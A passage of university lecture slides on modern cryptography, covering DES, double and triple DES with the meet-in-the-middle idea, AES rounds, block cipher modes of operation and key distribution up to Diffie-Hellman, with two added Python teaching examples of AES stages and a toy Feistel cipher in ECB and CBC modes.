  – Asymmetric key: X.509 (will be introduced in the lecture on Network Security)

Wrap-up
• What have we covered?
  – Cryptography
    • Basic concepts
    • Classic Cryptography
    • Modern symmetric cryptography
    • Asymmetric cryptography
    • Cryptographic hash
  – Authentication
    • Password-based authentication
    • Authentication in a distributed system
    • The Public Key Infrastructure

Slides References
• Prof. Vitaly Shmatikov, Cornell University

Outline for Next Class: Network Security
1. Introduction to Network Security
2. Network Vulnerabilities
3. Attacks
4. Controls
5. Encryption
6. SSL/TLS
7. More protocols
8. Firewalls
9. IDS and Honeypots
10. Web Security: Phishing
11. SQL Injection
12. XSS
13. Email Security

CIS 4520 Introduction to Cryptography: Modern Cryptography
Wenjing Zhang
[email protected]
Modern Cryptography
• Post-WW-II cryptography
• Secret key cryptography (symmetric cryptography)
  – DES
  – AES
• Public key cryptography (asymmetric cryptography)
  – RSA

Introduction to DES
• Early 70s: non-military crypto research was very unfocused
• 1972: National Bureau of Standards (now NIST) wanted a crypto algorithm which is:
  – secure
  – open (still remember Kerckhoffs’ Law?)
  – efficient
  – useful in diverse applications
• First open solicitation: May 1973
• Second solicitation: August 1974

Introduction to DES
• In response to NBS’s second solicitation, IBM submitted Lucifer
• DES based on Lucifer
• DES first published in 1975, seeking public scrutiny
• DES became a federal standard in 1976
• …
• 26 years!
• …
• DES was superseded by AES in 2002

Recap: Stream and Block Ciphers
• Block ciphers process messages in blocks, each of which is then en/decrypted
  – like a substitution on very big characters
  – 64 bits or more
• Stream ciphers process messages a bit or byte at a time when en/decrypting
• Many current ciphers are block ciphers
  – better analyzed
  – broader range of applications

Recap: Stream and Block Ciphers [figure]

Introduction to DES
• DES: Data Encryption Standard
  – Block cipher. 64-bit blocks
  – same algorithm used for encryption and decryption
  – 56-bit keys (effective key length: 56!)
    • represented as 64-bit
    • but every 8th bit is for parity only
  – symmetric: receiver uses the same key to decrypt

Introduction to DES
• DES: Data Encryption Standard
• Uses two primitive cryptographic operations seen before:
  – substitution (S-box) provides confusion
  – permutation (P-box) provides diffusion
• Uses standard arithmetic and logical operators
  – efficient hardware implementations

DES Encryption Overview [figure]
CIS 4520
Introduction to
Cryptography
DES

• Break up plaintext into 64-bit blocks


Wenjing Zhang

• Each block goes through 16 rounds


• Same process 16 times/block
– Bi = block after iteration i
– Li = Left half of block after iteration i
• 32 bits
– Ri = Right half of block after iteration i
• 32 bits.

10
CIS 4520
Introduction to
Cryptography
DES
Wenjing Zhang • For each block
– Initial permutation
– 16 rounds of substitution and permutation
– Final permutation
• Each round (Feistel cipher 𝑓):
– Li = Ri - 1
Li-1 Ri-1
– Ri = Li−1⊕ f (Ri−1, ki)
Ki
f

Li Ri
11
CIS 4520
Introduction to
Cryptography
DES

• Initial Permutation
Wenjing Zhang

58 50 42 34 26 18 10 2 60 52 44 36 28 20 12 4
62 54 46 38 30 22 14 6 64 56 48 40 32 24 16 8
57 49 41 33 25 17 9 1 59 51 43 35 27 19 11 3
61 53 45 37 29 21 13 5 63 55 47 39 31 23 15 7

• Performed before 16 rounds of encryption


– Move bit 58 to position 1, move bit 50 to
position 2, etc…
• Reversed by Inverse Initial Permutation
(a.k.a. final permutation) (after round 16)
• Does not add to security!!
– This is not a transposition cipher since the
algorithm is public!
12
CIS 4520
Introduction to
Cryptography
Overview of DES Round Structure

• Uses two 32-bit L & R halves


Wenjing Zhang

• Uses Feistel cipher 𝑓 as round function:


– Li = Ri - 1
– Ri = Li−1⊕ f (Ri−1, ki)
• 𝑓 takes 32-bit R half and 48-bit subkey:
– expands R to 48 bits using Expansion
permutation
– adds to subkey using XOR
– passes through 8 S-boxes to get 32-bit result
– finally permutes using 32-bit permutation

13
CIS 4520
Introduction to
Cryptography
DES

• Each round (Feistel cipher 𝑓):


Wenjing Zhang

– Li = Ri - 1
– Ri = Li−1⊕ f (Ri−1, ki)

Li-1 Ri-1

Ki
f

Li Ri
14
CIS 4520
Introduction to
Cryptography
DES: Round Function F

• Each round:
Wenjing Zhang
The Feistel (F) function
32 bit 32 bit 56 bit

48 bit
48 bit

32 bit

32 bit

32 bit

15
CIS 4520
Introduction to
Cryptography
DES
Wenjing Zhang
• Expansion permutation
32 bit
– R: from 32 bits to 48 bits
– Some bits used twice
32 1 2 3 4 5
4 5 6 7 8 9
48 bit Ki:48 bit
8 9 10 11 12 13
12 13 14 15 16 17
16 17 18 19 20 21
20 21 22 23 24 25
24 25 26 27 28 29
28 29 30 31 32 1

Right Half i-1 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32

32 1 2 3 4 5 4 5 6 7 8 9 8 9 10 11 12 13 12 13 14 15 16 17 16 17 18 19 20 21 20 21 22 23 24 25 24 25 26 27 28 29 28 29 30 31 32 1

16
CIS 4520
Introduction to
Cryptography
DES

• Expansion permutation
Wenjing Zhang 32 bit

– R: from 32 bits to 48 bits


– Some bits used twice
• few bits of plaintext may affect
48 bit
many bits of ciphertext Ki:48 bit

– R becomes the same length


as round-key for XOR

17
CIS 4520
Introduction to
Cryptography
DES

• XOR with key


Wenjing Zhang 32 bit

– “Key mixing”
– Simple bit-wise XOR with
round-i-key Ki (48 bits!)
48 bit
– How to generate Ki ? Ki:48 bit

– Later…

18
CIS 4520
Introduction to
Cryptography
DES

• S-boxes (substitution boxes)


Wenjing Zhang 32 bit

– R: from 48 bits to 32 bits


– Break R into 8 blocks
– 6 bits/block 48 bit Key:48 bit
– Block 1 goes through
box S1
– Block 2 goes through 32 bit

box S2
– Block 3 goes through
box S3
– …
– Block 8 goes through
box S8
19
CIS 4520
Introduction to
Cryptography
DES

• S-boxes (substitution boxes)


Wenjing Zhang 32 bit

– R: from 48 bits to 32 bits


– Break R into 8 blocks
– 6 bits/block 48 bit Ki:48 bit
– S-boxes are different

32 bit

20
CIS 4520
Introduction to
Cryptography
DES

• S-boxes (substitution boxes)


Wenjing Zhang

– Each box defines a substitution


– 6-bit input, 4-bit output
• S-box 1:
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
0 14 4 13 1 2 15 11 8 3 10 6 12 5 9 0 7
1 0 15 7 4 14 2 13 1 10 6 12 11 9 5 3 8
2 4 1 14 8 13 6 2 11 15 12 9 7 3 10 5 0
3 15 12 8 2 4 9 1 7 5 11 3 14 10 0 6 13

– Look up table: bits 1 and 6 define row, bits 2-5


define column

21
CIS 4520
Introduction to
Cryptography
DES

• S-box 1:
Wenjing Zhang

0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
0 14 4 13 1 2 15 11 8 3 10 6 12 5 9 0 7
1 0 15 7 4 14 2 13 1 10 6 12 11 9 5 3 8
2 4 1 14 8 13 6 2 11 15 12 9 7 3 10 5 0
3 15 12 8 2 4 9 1 7 5 11 3 14 10 0 6 13

– Look up table: bits 1 and 6 define row, bits 2-5


define column
– Input: 010011

22
CIS 4520
Introduction to
Cryptography
DES

• S-box 1:
Wenjing Zhang

0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
0 14 4 13 1 2 15 11 8 3 10 6 12 5 9 0 7
1 0 15 7 4 14 2 13 1 10 6 12 11 9 5 3 8
2 4 1 14 8 13 6 2 11 15 12 9 7 3 10 5 0
3 15 12 8 2 4 9 1 7 5 11 3 14 10 0 6 13

– Look up table: bits 1 and 6 define row, bits 2-5


define column
– Input: 010011
• Bits 1,6 → 01 → row 1
• Bits 2-5 → 1001 → column 9

23
CIS 4520
Introduction to
Cryptography
DES

• S-box 1:
Wenjing Zhang

0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
0 14 4 13 1 2 15 11 8 3 10 6 12 5 9 0 7
1 0 15 7 4 14 2 13 1 10 6 12 11 9 5 3 8
2 4 1 14 8 13 6 2 11 15 12 9 7 3 10 5 0
3 15 12 8 2 4 9 1 7 5 11 3 14 10 0 6 13

– Look up table: bits 1 and 6 define row, bits 2-5


define column
– Input: 010011
• Bits 1,6 → 01 → row 1
• Bits 2-5 → 1001 → column 9
• Output: 6 → 0110

24
CIS 4520
Introduction to
Cryptography
DES

• S-box 1:
Wenjing Zhang

0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
0 14 4 13 1 2 15 11 8 3 10 6 12 5 9 0 7
1 0 15 7 4 14 2 13 1 10 6 12 11 9 5 3 8
2 4 1 14 8 13 6 2 11 15 12 9 7 3 10 5 0
3 15 12 8 2 4 9 1 7 5 11 3 14 10 0 6 13

– Look up table: bits 1 and 6 define row, bits 2-5


define column
– Why use bits 1 and 6 to define row?
– Each row is a substitution from 0-15 to 0-15,
why?

25
CIS 4520
Introduction to
Cryptography
DES

• P-box (permutation box)


Wenjing Zhang 32 bit

– Input: 32 bits
– Bits are rearranged according
to a fixed permutation.
48 bit
– Output: 32 bits Ki:48 bit

– Why P-box?
– Add diffusion 32 bit

– Each S-box's output bits are


spread across different 32 bit

S-boxes in the next round


– Change 1 plain text bit: big
changes to many blocks after
only a few rounds
26
CIS 4520
Introduction to
Cryptography
DES

• P-box (permutation box p)


Wenjing Zhang

S1 S2 S3 S4 S5 S6 S7 S8

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32

16 7 20 21 29 12 28 17 1 15 23 26 5 18 31 10 2 8 24 14 32 27 3 9 19 13 30 6 22 11 4 25

Image courtesy of Lawrie Brown, University of Florida

• P-box at end of each round


• Increases diffusion/avalanche effect

27
DES Round in Full
[Figure: one DES round. Right Half i-1 (32 bits) → expansion E (48 bits) → XOR with Round Key i (48 bits) → S1 … S8 (figure labels: input symbol, control, output symbol) → permutation P (32 bits) → XOR with Left Half i-1 → Right Half i]
Expansion E (48 output positions, each naming the input bit it copies):
32 1 2 3 4 5 4 5 6 7 8 9 8 9 10 11 12 13 12 13 14 15 16 17 16 17 18 19 20 21 20 21 22 23 24 25 24 25 26 27 28 29 28 29 30 31 32 1
Permutation P (32 output positions):
16 7 20 21 29 12 28 17 1 15 23 26 5 18 31 10 2 8 24 14 32 27 3 9 19 13 30 6 22 11 4 25
Image courtesy of Lawrie Brown, University of Florida
DES
• Each round: [figure]
• The key schedule: [figure]
DES
• Key Schedule
– Key is 56 bits (64 – 8 parity)
• Go through a permutation before round 1
• Then for each round:
– divide into two halves
– circular shift of each half (shift 1 or 2 bits depending on round)
• Round 1, 2, 9, 16: shift by 1 bit
• Other rounds: shift by 2 bits
– select 48 of the 56 bits
DES
• Key Schedule
[Figure: 64-bit key with parity bits → permuted choice 1 → 56-bit key → left shift of each 28-bit half → permuted choice 2 → 48-bit subkey]
Permuted choice 1 (56 positions, each naming a bit of the 64-bit key; the parity bits 8, 16, …, 64 are dropped):
57 49 41 33 25 17 9 1 58 50 42 34 26 18 10 2 59 51 43 35 27 19 11 3 60 52 44 36 63 55 47 39 31 23 15 7 62 54 46 38 30 22 14 6 61 53 45 37 29 21 13 5 28 20 12 4
Left shift by 1 of each 28-bit half (bit 1 moves to position 28, bit 29 to position 56):
2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 1 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 29
Permuted choice 2 (48 positions, each naming a bit of the 56-bit key):
14 17 11 24 1 5 3 28 15 6 21 10 23 19 12 4 26 8 16 7 27 20 13 2 41 52 31 37 47 55 30 40 51 45 33 48 44 49 39 56 34 53 46 42 50 36 29 32
Image courtesy of Lawrie Brown, University of Florida
DES
• The overall process [figure]
• Design elements
– block size
– key size
– number of rounds
– subkey generation algorithm
– round function
– fast software en/decryption
– ease of analysis
DES Decryption
• Decrypt must unwind steps of data computation
• With Feistel design, do encryption steps again using subkeys in reverse order (SK16 … SK1)
– IP undoes final FP step of encryption
– 1st round with SK16 undoes 16th encrypt round
– ….
– 16th round with SK1 undoes 1st encrypt round
– then final FP undoes initial encryption IP
– thus recovering original data value
Fundamentals of DES
• Confusion: Utilizes S-boxes for complex key-ciphertext relationships, ensuring small key changes cause major ciphertext alterations.
• Diffusion: Employs P-boxes and a Feistel structure to spread plaintext and key influences, so bit alterations affect much of the ciphertext.
• Avalanche Effect: Designed to ensure a single input bit change drastically alters many output bits, enhancing security.
• Reversibility: Features a Feistel network, making encryption and decryption processes similar, simplifying implementation.
• Efficiency: Optimized for performance in both hardware and software, considering the computational limits of the era.
• Open Standard: Subjected to thorough public examination, bolstering trust in its security capabilities.
• Adaptability: Flexible for various applications, contributing to its broad acceptance and use as a federal standard.
DES
• Strength of DES
– Key length: 56 bits.
• Brute force attacks!!
– DES Challenge: 56-bit-key-encrypted phrase decrypted
• July 17, 1998: the Electronic Frontier Foundation (EFF) DES Cracker, a machine built for less than $250,000, in < 3 days
• January 19, 1999: Distributed.Net (w/EFF), 22 hours and 15 minutes (over many machines)
• Now: with commercially available devices: < 1 day
DES
• Multiple Encryption with DES
– Double DES
– Encrypt the plaintext twice with two different DES keys
– Key length increases to 112 bits
– Unfortunately, this is not really more secure than doing DES once
– Meet-in-the-middle attack
Meet-in-the-middle attack
[Figure: Encryption: P → E with K1 → X → E with K2 → C; Decryption: C → D with K2 → X′ → D with K1 → P]
Observation: X = E_K1(P) = D_K2(C)
• Of course, we don't know K1 and K2
– So we do two parallel exhaustive searches
• For a known pair (P, C),
– Encrypt P with all 2^56 possible keys
• Store the results in a table sorted by the value of X
– Decrypt C with all 2^56 possible keys
• For each result X′, check the table for X = X′
– A match reveals a possible combination of keys <K1, K2>
DES
• Multiple Encryption with DES
– Triple DES
– Encrypt the plaintext three times
– With two (or three) different DES keys
– Key length increases to 112 bits (or 168 bits)
– for each block:
• encrypt with key 1
• decrypt with key 2 (this doesn't really decrypt the message!)
• encrypt with key 1
• If one key is used, it's equivalent to doing DES once.
AES: Advanced Encryption Standard
• DES cracked, replacement needed
• Triple-DES – slow, has small blocks
• NIST (National Institute of Standards and Technology) issued call for ciphers in 1997
– private key symmetric block cipher
– 128-bit data, 128/192/256-bit keys
– stronger & faster than Triple-DES
– provide full specification & design details
– Secure for next 50-100 years
Advanced Encryption Standard
• NIST has released all submissions & unclassified analyses
– 15 candidates: 1998
– 5 finalists: 1999
– MARS (IBM) - complex, fast, high-security margin
– RC6 (USA) - v. simple, v. fast, low-security margin
– Rijndael (Belgium) - clean, fast, good security margin
– Serpent (Euro) - slow, clean, v. high-security margin
– Twofish (USA) - complex, v. fast, high-security margin
Advanced Encryption Standard
• Winner: Rijndael
– Vincent Rijmen and Joan Daemen
"Rijndael. A variant of Square, the chief drawback to this cipher is the difficulty Americans have pronouncing it."
- Bruce Schneier (American cryptographer)
• NIST estimated that a machine that could break a 56-bit DES key in 1 second would take 149 trillion years to crack a 128-bit AES key
AES (Rijndael) Overview
[Figure]
AES (Rijndael) Overview
• Block size: 128 bits
• In each round
– SubBytes: non-linear byte substitution
– ShiftRows: circular byte shift in each row
– MixColumns: add diffusion
– AddRoundKey: bitwise XOR
State array
The AES State array is a data structure used in the encryption and decryption process to hold an intermediate representation of the data.
Given by a 4x4 array of bytes.
Block size: 128 bits = 16 bytes.
AES: SubBytes
SubBytes: table lookup with a 16x16 S-box of bytes
Change each byte of the state with the corresponding byte from the S-box matrix: S-box[X, Y]
Non-linear, based on polynomial arithmetic
• used to define and perform operations in Finite Fields, which provide a mathematical framework for designing security algorithms and protocols.
AES: SubBytes
SubBytes: table lookup with a 16x16 S-box of bytes
Example:
S1,1 = 10001011 (8b)
S'1,1 = value at row 8 and column b (11) in the S-box
AES: SubBytes
S-box: lookup table with 16x16 bytes
• Input: 10001011 (8b) → 00111101 (3d)
AES: ShiftRows
• 1st row is unchanged
• 2nd row does 1 byte circular shift to left
• 3rd row does 2 byte circular shift to left
• 4th row does 3 byte circular shift to left
AES: MixColumns
• each column is processed separately based on polynomial arithmetic
• each byte is replaced by a value dependent on all 4 bytes in the column
S'0,0 = 2·S0,0 + 3·S1,0 + 1·S2,0 + 1·S3,0
(here + is XOR and · is multiplication in the finite field GF(2^8))
AES: AddRoundKey
• XOR state with 128 bits of the round key
• again processed by column (through effectively a series of byte operations)
[Figure: state matrix ⊕ round key matrix]
AES: the complete round
[Figure]
AES: the complete round visualization
[Figure]
S-Box Rationale
• The S-box is constructed by finding the multiplicative inverse in a finite field
• Designed to be resistant to known cryptanalytic attacks
• The Rijndael developers sought a design that has a low correlation between input bits and output bits and the property that the output is not a linear mathematical function of the input
• The nonlinearity is due to the use of the multiplicative inverse
Mix Columns Rationale
• Coefficients of a matrix are designed to ensure the output (ciphertext) is very sensitive to changes in the input (plaintext), to add diffusion
• The mix column transformation combined with the shift row transformation ensures that after a few rounds all output bits depend on all input bits
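The four AES stages of the preceding slides, carried through in arithmetic as an added example that is not part of the lecture notes or of the AES specification: SubBytes is computed from the GF(2^8) multiplicative inverse plus the affine map instead of a table, and MixColumns applies the 2·S0 + 3·S1 + S2 + S3 formula with + as XOR.

```python
"""Added example, not code from the course or from FIPS-197: the AES stages the
slides describe, computed from the field arithmetic rather than looked up.
SubBytes is the GF(2^8) multiplicative inverse followed by the affine map
(slide 53); MixColumns is S'0 = 2*S0 + 3*S1 + S2 + S3 with + as XOR and
* as multiplication modulo x^8 + x^4 + x^3 + x + 1 (slide 49)."""
from typing import List

AES_POLY = 0x11B          # x^8 + x^4 + x^3 + x + 1, the Rijndael field polynomial
State = List[List[int]]   # 4 rows x 4 columns of bytes, state[row][col]


def gf_mul(a: int, b: int) -> int:
    """Multiply two bytes as polynomials over GF(2), reduced modulo AES_POLY."""
    result = 0
    while b:
        if b & 1:
            result ^= a
        a <<= 1
        if a & 0x100:         # degree reached 8: subtract (XOR) the modulus
            a ^= AES_POLY
        b >>= 1
    return result


def gf_inv(a: int) -> int:
    """Multiplicative inverse as a^254 (a^255 = 1 for every nonzero a); 0 maps to 0."""
    result, base, exp = 1, a, 254
    while exp:
        if exp & 1:
            result = gf_mul(result, base)
        base = gf_mul(base, base)
        exp >>= 1
    return result if a else 0


def _rotl8(x: int, n: int) -> int:
    return ((x << n) | (x >> (8 - n))) & 0xFF


def sbox(x: int) -> int:
    """S-box[x]: invert in the field, then apply the affine map
    b ^ rotl(b,1) ^ rotl(b,2) ^ rotl(b,3) ^ rotl(b,4) ^ 0x63."""
    b = gf_inv(x)
    return b ^ _rotl8(b, 1) ^ _rotl8(b, 2) ^ _rotl8(b, 3) ^ _rotl8(b, 4) ^ 0x63


def sub_bytes(state: State) -> State:
    return [[sbox(v) for v in row] for row in state]


def shift_rows(state: State) -> State:
    """Row r is rotated left by r bytes (slide 48)."""
    return [row[r:] + row[:r] for r, row in enumerate(state)]


def mix_column(col: List[int]) -> List[int]:
    s0, s1, s2, s3 = col
    return [
        gf_mul(2, s0) ^ gf_mul(3, s1) ^ s2 ^ s3,   # S'0 = 2*S0 + 3*S1 + 1*S2 + 1*S3
        s0 ^ gf_mul(2, s1) ^ gf_mul(3, s2) ^ s3,
        s0 ^ s1 ^ gf_mul(2, s2) ^ gf_mul(3, s3),
        gf_mul(3, s0) ^ s1 ^ s2 ^ gf_mul(2, s3),
    ]


def mix_columns(state: State) -> State:
    cols = [mix_column([state[r][c] for r in range(4)]) for c in range(4)]
    return [[cols[c][r] for c in range(4)] for r in range(4)]


def add_round_key(state: State, round_key: State) -> State:
    return [[s ^ k for s, k in zip(srow, krow)] for srow, krow in zip(state, round_key)]


def aes_round(state: State, round_key: State) -> State:
    """One full round in the slides' order: SubBytes, ShiftRows, MixColumns, AddRoundKey."""
    return add_round_key(mix_columns(shift_rows(sub_bytes(state))), round_key)


def sbox_is_bijective() -> bool:
    """A substitution must be invertible for decryption (slide 55): 256 distinct outputs."""
    return len({sbox(x) for x in range(256)}) == 256
```

The slides' example, input 8b → 3d, falls out of `sbox(0x8B)`; the MixColumns check values used below are the published FIPS-197 ones.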
Summary: Four Stages
One permutation and three substitutions
• Substitute bytes: uses an S-box to perform a byte-by-byte non-linear substitution of the block
• Shift Rows: a simple permutation
• Mix Columns: a substitution that uses polynomial arithmetic to combine the four bytes in each column
• Add Round Key: a simple bitwise XOR of the current block with a portion of the expanded key
• Each stage is easily reversible, which gives decryption
Secret Key Cryptography
• DES
• AES
– Secure (at least for now)
– Efficient
– Applicable in a wide range of applications
How to encrypt large messages?
• Use block ciphers
– Divide a large message into blocks
– Pad the last block if it is short
• Use known non-data values and a number to indicate the padding size or the message size
• How to decide the keys for a sequence of data blocks
– Use the same key
• The same block in the plaintext results in the same block in the ciphertext
– Use different keys
• How to generate and securely transmit a large number of keys?
Modes of Operation
• 4 main modes of operation
– Electronic Codebook (ECB)
– Cipher Block Chaining (CBC)
– Output Feedback (OFB)
– Cipher Feedback (CFB)
– Counter mode (CTR)
• Consider properties
– Robustness to repetitions in message
– Efficiency
– Error propagation
Electronic Codebook (ECB)
• Each block is encoded independently using the same key
[Figure: M1, M2, M3 (64 bits each) and M4 (40 bits + pad) → ENC with K → C1, C2, C3, C4]
C_j = E(K, M_j)
Electronic Codebook (ECB)
• Each block is encoded independently using the same key
– Deterministic
• Repeated data blocks in plaintext will reveal a pattern
• E.g., TCP headers, mail headers, etc., long strings of 0's.
– No chaining dependency
• Reordered ciphertext → reordered plaintext
– No error propagation
• Error in C_i only results in error in the corresponding P_i
– Used in secure transmission of a single value
• Not recommended for encrypting more than 1 data block with the same key
Cipher Block Chaining (CBC)
• Each block is XOR'ed with the preceding ciphertext block
[Figure: IV ⊕ M1 → ENC with K → C1; C1 ⊕ M2 → ENC with K → C2; C2 ⊕ M3 → C3; C3 ⊕ M4 (40 bits + pad) → C4]
C_1 = E(K, M_1 ⊕ IV)
C_j = E(K, M_j ⊕ C_{j−1})
Cipher Block Chaining (CBC)
• Each block is XOR'ed with the preceding ciphertext block
– Randomized
• Repeated data blocks are encrypted differently
• Secure if IV is random
– Chaining dependent
• Reorder affects decryption
– Error propagates
• Error in 1 ciphertext block propagates to 2 blocks in decryption, but no further
– Used in secure transmission, authentication
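An added example (not code from the course) that ties the Feistel decryption rule of slide 33 to the ECB and CBC properties above: a toy 64-bit Feistel cipher whose round function is a SHA-256 stand-in for DES's S-boxes, decrypted by reversing the subkey order, then run in both modes on a message with repeated blocks so that ECB's pattern leak and CBC's two-block error propagation can be measured. The key, IV and message are constructed sample values.

```python
"""Added example, not code from the course: a toy 64-bit Feistel block cipher
(round function built from SHA-256, a stand-in for DES's S-boxes) run in ECB
and CBC modes. It is a teaching toy, not a usable cipher."""
import hashlib
from typing import List

BLOCK = 8      # 64-bit block, like DES
ROUNDS = 8     # DES uses 16; 8 is enough to show the structure
KEY = b"toy-demo-key"              # constructed sample key
IV = bytes(range(BLOCK))           # constructed sample IV (fixed only for the demo)
MSG = b"ATTACK AT DAWN. " * 3      # constructed message whose 8-byte blocks repeat

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def subkeys(key: bytes) -> List[bytes]:
    """Toy key schedule (an assumption, not DES's PC-1/PC-2): one subkey per round."""
    return [hashlib.sha256(key + bytes([i])).digest() for i in range(ROUNDS)]

def _f(subkey: bytes, half: bytes) -> bytes:
    """Round function: keyed hash of the 32-bit half, truncated to 32 bits."""
    return hashlib.sha256(subkey + half).digest()[:BLOCK // 2]

def feistel(block: bytes, ks: List[bytes]) -> bytes:
    """Run the rounds with subkeys in the given order; the final swap mirrors DES.
    Decryption is the same function with the subkeys reversed (slide 33)."""
    left, right = block[:BLOCK // 2], block[BLOCK // 2:]
    for k in ks:
        left, right = right, _xor(left, _f(k, right))
    return right + left

def encrypt_block(key: bytes, block: bytes) -> bytes:
    return feistel(block, subkeys(key))

def decrypt_block(key: bytes, block: bytes) -> bytes:
    return feistel(block, subkeys(key)[::-1])      # SK_n ... SK_1

def pad(msg: bytes) -> bytes:
    """Slide 57: fill the short last block with a known value recording the pad size."""
    n = BLOCK - len(msg) % BLOCK
    return msg + bytes([n]) * n

def unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def blocks(data: bytes) -> List[bytes]:
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]

def ecb_encrypt(key: bytes, msg: bytes) -> bytes:
    return b"".join(encrypt_block(key, b) for b in blocks(pad(msg)))   # C_j = E(K, M_j)

def ecb_decrypt(key: bytes, ct: bytes) -> bytes:
    return unpad(b"".join(decrypt_block(key, c) for c in blocks(ct)))

def cbc_encrypt(key: bytes, iv: bytes, msg: bytes) -> bytes:
    out, prev = [], iv
    for b in blocks(pad(msg)):
        prev = encrypt_block(key, _xor(b, prev))   # C_j = E(K, M_j xor C_{j-1}), C_0 = IV
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = [], iv
    for c in blocks(ct):
        out.append(_xor(decrypt_block(key, c), prev))   # M_j = D(K, C_j) xor C_{j-1}
        prev = c
    return unpad(b"".join(out))

def repeated_ciphertext_blocks(ct: bytes) -> int:
    """Number of duplicate ciphertext blocks: > 0 means plaintext patterns leak."""
    cs = blocks(ct)
    return len(cs) - len(set(cs))

def cbc_damaged_blocks(key: bytes, iv: bytes, msg: bytes, flip_block: int) -> List[int]:
    """Flip one bit of ciphertext block `flip_block`, decrypt without unpadding and
    report which plaintext blocks came out wrong (slide 62 says exactly two)."""
    ct = bytearray(cbc_encrypt(key, iv, msg))
    ct[flip_block * BLOCK] ^= 0x01
    expected, prev, damaged = blocks(pad(msg)), iv, []
    for i, c in enumerate(blocks(bytes(ct))):
        if _xor(decrypt_block(key, c), prev) != expected[i]:
            damaged.append(i)
        prev = c
    return damaged

if __name__ == "__main__":
    print("ECB duplicate blocks:", repeated_ciphertext_blocks(ecb_encrypt(KEY, MSG)))
    print("CBC duplicate blocks:", repeated_ciphertext_blocks(cbc_encrypt(KEY, IV, MSG)))
    print("CBC blocks hit by a 1-bit error in C_1:", cbc_damaged_blocks(KEY, IV, MSG, 1))
```

MSG pads to 7 blocks holding only 3 distinct values, so ECB shows 4 duplicate ciphertext blocks while CBC shows none, and a flipped bit in C_1 corrupts exactly plaintext blocks 1 and 2.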
Cipher Feedback (CFB)
• Block encryption
– b-bit IV; use the same key to get b-bit output
• Leftmost s bits of the output
– Are XORed with an s-bit message segment
– The resulting s-bit ciphertext segment is fed back to the shift register
• Shift register
– Shifts left s bits; fills the rightmost bits with the s-bit ciphertext
CFB Properties
• Randomized
– Repeated data blocks are XORed with different bitstrings
– Secure if IV is random
• Chaining dependent
– Reorder affects decryption
• Error propagates
– Error in 1 ciphertext block propagates to several blocks in decryption
• Generally used in stream-oriented transmission, authentication
Cipher Feedback (CFB)
• Converts DES into a stream cipher
– No need to pad the message: ciphertext is of the same length as the plaintext
– Can operate in real time
– Output of the block encryption is used as subkeys of the stream cipher
– Preceding ciphertext segment forms part of the input of the block encryption
– The same key is used in the block encryption
Output Feedback (OFB)
• Leftmost s bits of the encryption output are fed back to the shift register
[Figure]
OFB Properties
• Randomized
– Repeated data blocks encrypted with different keys
– Secure if IV is random
• Chaining independent
– Reorder does not affect decryption
– Key stream is plaintext-independent: allows pre-computing of the pseudo-random stream
• No error propagation
– Preceding ciphertext is not involved in later encryption
• Used in stream-oriented transmission over noisy channels (satellite communication)
Encryption Modes for Real-world Applications
• ECB (Electronic Codebook)
– Used for small, unique data sets where pattern recognition is not a concern.
– Examples: Encrypting keys in a Digital Rights Management system, encrypting individual items without patterns (e.g., single-use tokens).
• CBC (Cipher Block Chaining)
– Common in secure file transfer and disk encryption.
– Examples: HTTPS communications, VPN data transfer, full disk encryption in laptops and external drives.
• CFB (Cipher Feedback)
– Self-synchronizing stream cipher.
– Examples: Voice over IP (VoIP) calls, encrypted messaging apps, real-time video conferencing encryption.
• OFB (Output Feedback)
– Suitable for streaming data where error propagation must be avoided.
– Examples: Live video streaming, satellite data transmission, secure radio communication.
Counter Mode (CTR)
• Use a counter equal to the plaintext block size to construct key streams
– No chaining, pre-computing the key stream, very efficient
– Used to encrypt high-speed data, or to generate random bitstreams (e.g., PRNG)
Reading Assignment for Next Class
• Chapter 9 Public-Key Cryptography and RSA, Section 9.1 - 9.2 of Cryptography and Network Security: Principles and Practice. 2017. (7th Ed.) William Stallings. Pearson Education.
• Chapter 10 Other Public-Key Cryptosystems, Section 10.1 of Cryptography and Network Security: Principles and Practice. 2017. (7th Ed.) William Stallings. Pearson Education.
Secret Key Cryptography
• Two difficult problems associated with the secret-key cryptosystem:
• How to provide non-repudiation?
– Need to uniquely identify an entity
Secret Key Cryptography
• Two difficult problems associated with the secret-key cryptosystem:
• How to securely distribute secret keys?
– Which key to use? How to obtain the key securely?
– Pre-loaded keys are used in many applications, e.g., at sensor nodes
– However, risk exists if keys are stolen
– We need to pre-load many keys…
Secret Key Cryptography
• How many keys do we need?
• For n people
– 2 people: 1 key
– 3 people: 3 keys
– 4 people: 6 keys
– 5 people: 10 keys
Secret Key Cryptography
• How many keys do we need?
• For n people
– n people: n(n-1)/2 keys
• O(n^2)
• We don't like anything more than O(n)…
– Can we ask all n people to share the same key?
– Do we have a better way to generate and distribute keys?
Key Distribution/Agreement
• Key Distribution
– The process to assign and transfer keys to a participant
• Key Agreement
– The process whereby two (or more) parties negotiate a key
– As part of communication: SKIP (Simple Key-Management for Internet Protocol)
• Typically, key distribution/agreement occurs in conjunction with or after authentication.
Diffie-Hellman Key Agreement
• Diffie and Hellman: important breakthrough in 1976
– Started the modern age of cryptography
– To establish a shared secret number between two parties using a public communication channel.
• Mathematics are very deep
– Working in a multiplicative group
– Use the hardness of computing discrete logarithms in a finite field to guarantee security.
Intuition: Exchange of Colors
[Figure; source: Wikipedia]
Diffie-Hellman Key Exchange
[Figure]
Diffie-Hellman Protocol: Example
